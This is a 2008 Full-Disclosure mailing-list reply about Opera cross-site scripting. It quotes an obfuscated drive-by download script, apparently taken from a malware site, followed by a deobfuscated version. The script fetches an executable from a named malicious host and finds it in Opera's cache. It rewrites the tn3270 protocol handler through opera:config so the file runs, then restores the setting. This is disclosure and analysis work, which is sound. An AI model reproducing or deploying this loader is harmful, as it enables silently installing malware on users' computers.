Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST)
From: Kanedaaa Bohater <kaneda@...ater.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Opera Stored Cross Site Scripting


> Just found a way to use Stefano's opera:config idea to execute code from
> remote.

Hi.

3 months ago I found on some malware site
(www.google.com.update.login.jsp.podavanda.cn) that when your UserAgent
was Opera, they sent you code similar to yours, but they first
downloaded a malware .exe file to opera:cache (Opera pre-downloads
files) and later changed the tn3270:// protocol handler to this file (but without
opera:historysearch). It was probably for an older Opera version...


<script>
blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, ''));
blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, '');
blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, ''));
blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@...Bi@f@...Bm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, ''));
document.appendChild(blank_iframe);
blank_iframe_window.eval
 	("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\
 	config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), "cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\
 	config_iframe.src = 'opera:config';\
 	document.appendChild(config_iframe);\
 	app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\
 	cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\
 	app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@...yo@...ye@...yoXmY.Xu@...YaytYeU.UlYoygXiyny.Uj@s@pX.@...Xd@...YaynydXaY.yc@...XI@I@...yxXlXoUaydUe@r@.ye@...X".replace(/[UXYy@]/g, '');\
 	app_iframe.onload = function ()\
 	{\
 		cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\
 		cache_iframe.onload = function ()\
 		{\
 			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
 			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
 			filename = cache.match(re);\
 			config_iframe_window.eval\
 			(\"\
 			opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\
 			app_link = document.createElement('a');\
 			app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\
 			app_link.click();\
 			setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, ''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\
 			\");\
 		};\
 		document.appendChild(cache_iframe);\
 	};\
 	document.appendChild(app_iframe);");
</script>


which, deobfuscated, was something like:

<script>
blank_iframe = document.createElement("iframe");
blank_iframe.src = "about:blank";
blank_iframe.setAttribute("style", "display:none");
blank_iframe.setAttribute("id"), "blank_iframe_window");
document.appendChild(blank_iframe);
blank_iframe_window.eval
 	("config_iframe = document.createElement("iframe");\
 	config_iframe.setAttribute("id", "config_iframe_window");\
 	config_iframe.src = 'opera:config';\
 	document.appendChild(config_iframe);\
 	app_iframe = document.createElement("script");\
 	cache_iframe = document.createElement("iframe");\
 	app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\
 	app_iframe.onload = function ()\
 	{\
 		cache_iframe.src = "opera:cache";\
 		cache_iframe.onload = function ()\
 		{\
 			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
 			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
 			filename = cache.match(re);\
 			config_iframe_window.eval\
 			(\"\
 			opera.setPreference("Network","TN3270 App",opera.getPreference("User Prefs","Cache Directory4")+parent.filename[1]);\
 			app_link = document.createElement('a');\
 			app_link.setAttribute("href", "tn3270://nothing");\
 			app_link.click();\
 			setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\
 			\");\
 		};\
 		document.appendChild(cache_iframe);\
 	};\
 	document.appendChild(app_iframe);");
</script>

but unfortunately I don't have much time to test it...

-- 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]..
[+] You can take our lives,but you will never take our Freedom - W.Wallace
[+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama
[+] Revolution the only solution - System of a down...
[+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0
[-] Kanedaaa... Bohateur... Cucumber Team Member...     kaneda@...ater.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
